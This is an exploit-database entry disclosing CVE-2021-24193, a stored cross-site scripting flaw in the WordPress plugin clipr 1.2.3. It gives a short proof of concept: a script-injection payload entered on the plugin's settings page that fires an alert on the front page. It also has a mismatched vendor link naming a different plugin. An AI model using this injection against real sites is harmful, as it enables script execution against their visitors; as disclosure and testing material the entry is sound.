Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-24193 | CWE-79 | N/A | Medium |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2022-03-30 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N | 0.02192 | 0.50148 |
# Exploit Title: WordPress plugin clipr version 1.2.3 - ( Authenticated ) # Date: 29-03-2022 # Exploit Author: Hassan Khan Yusufzai - Splint3r7 # Vendor Homepage: https://wordpress.org/plugins/clipr/ <https://wordpress.org/plugins/amministrazione-aperta/> # Version: 1.2.3 # Tested on: Firefox # Contact me: h [at] spidersilk.com # POC - Install Plugin https://wordpress.org/plugins/clipr/ - Navigate to the settings page pf the plugin: http://localhost:10003/wp-admin/options-general.php?page=clipr - Inject paylaod `asdasd'></script><script>alert(1)</script>` - Navigate to the main page of the WordPress URL `http://localhost:10003/` <http://localhost:10003/> - Malicious Javascript payload will execute.
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.